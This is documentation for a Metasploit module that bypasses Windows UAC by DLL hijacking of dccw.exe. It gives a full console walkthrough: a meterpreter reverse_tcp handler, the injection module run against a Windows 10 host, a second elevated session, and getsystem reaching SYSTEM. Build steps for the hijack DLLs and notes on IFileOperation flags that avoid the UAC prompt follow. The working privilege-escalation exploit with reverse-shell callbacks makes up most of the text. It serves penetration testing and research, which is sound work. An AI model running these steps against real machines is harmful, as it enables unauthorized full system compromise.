## Vulnerable Application

This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process.  It has been tested on and 
supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703.  It does not work with any versions of Windows 7.

Not Applicable; works on stock Windows releases.

### Running Example:
```
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set LHOST <MSF_IP>
LHOST => <MSF_IP>
>  set LPORT 30009
LPORT => 30009
>  show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     30009            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


> run -z
[*] Started reverse TCP handler on <MSF_IP>:30009 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:30009 -> <Win10x86_IP>:50041) at 2017-10-03 12:17:42 -0700
[*] Session 1 created in the background.
> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (<Win10x86_IP>)
Computer        : WIN10X86-1511
OS              : Windows 10 (Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
> sessions -C ifconfig
[*] Running 'ifconfig' on meterpreter session 1 (<Win10x86_IP>)

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:73:25:67
MTU          : 1500
IPv4 Address : <Win10x86_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cc97:6548:c10a:f034
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  6
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:86a0
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)

> use exploit/windows/local/bypassuac_injection_winsxs
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set lhost <MSF_IP>
lhost => <MSF_IP>
> set lport 30010
lport => 30010
> set verbose true
verbose => true
> show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     30010            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


> run -j
[*] Exploit running as background job.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
[*] Started reverse TCP handler on <MSF_IP>:30010 
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
[+] Windows 10 (Build 10586). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 18944 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting  into process ID 3476
[*] Opening process 3476
[*] Injecting struct into 3476
[*] Executing payload
[+] Successfully injected payload in to process: 3476
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:30010 -> <Win10x86_IP>:50078) at 2017-10-03 12:19:03 -0700
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[+] All the dropped elements have been successfully removed
> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
  2   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  <MSF_IP>:30010 -> <Win10x86_IP>:50078 (<Win10x86_IP>)

> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
> sessions -C getsystem
[*] Running 'getsystem' on meterpreter session 1 (<Win10x86_IP>)
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[*] Running 'getsystem' on meterpreter session 2 (<Win10x86_IP>)
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: NT AUTHORITY\SYSTEM
> exit -y
```

## Compiling Instructions
### Compiling Template DLLs 
To build the x86 template dll, use data/templates/src/pe/dll_gdiplus/build.sh
(Requires mingw-w64 package from apt)
```
cd data/templates/src/pe/dll_gdiplus
./build.sh
cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll
```
To build the x64 binary 
(In an x64 VS2013 command prompt)
```
Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib"
cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll
```

### Compiling bypassuac-x86.dll and bypassuac-x64.dll
Open the Visual studio solution located in 
metasploit-framework/external/source/exploits/bypassuac_injection/
Choose ```release``` from the Solution configurations, build the x86 and x64 solutions.  The binaries should already 
be in the right place.

# More information
(From PR)

I decided to create a different module and not to update the one called "bypassuac_injection", because in order to
perform a DLL hijacking, I need to create several folders in which insert our malicious DLL. Also, I deleted these
files and folders in a different way, instead using the method "register_file_for_cleanup()", so as to be able to 
remove the created folders and also prevent a very large output.

If you want to understand the module in a deeper way I recommend you to visit the C++ project on my github: 
https://github.com/L3cr0f/DccwBypassUAC

## **DLL INJECTION**
**/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
/metasploit-framework/data/post/bypassuac-x64.dll
/metasploit-framework/data/post/bypassuac-x86.dll**

To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32\") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in latest Windows 10 systems (build equal or greater than 15003), the IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:

`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`

to

`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`

Note that this modification does not affect other modules.
To conclude this section, I didn't found the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.

## **DLL HIJACKING**
**/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc
/metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh
/metasploit-framework/lib/msf/core/exploit/exe.rb
/metasploit-framework/lib/msf/util/exe.rb**

To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by
Metasploit since we need to forward some functions to the legit DLL, so we need to create a new couple of DLL templates,
which are exactly the same but including the forwarding feature (the way I have implemented does not work on Windows 7).
Now, despite working in a successfully way, I think it would be great including this forwarding feature on the fly, I mean,
without having to create an additional DLL template. I don't know how this can be done, so if you come up with something,
let me know.

Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.

## **Setup the vulnerable environment**

The vulnerable environment setup is the same as the module "bypassuac_injection", we need a meterpreter session, select
the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute
with high integrity and set the regular parameters of the payload (LHOST, LPORT, etc).
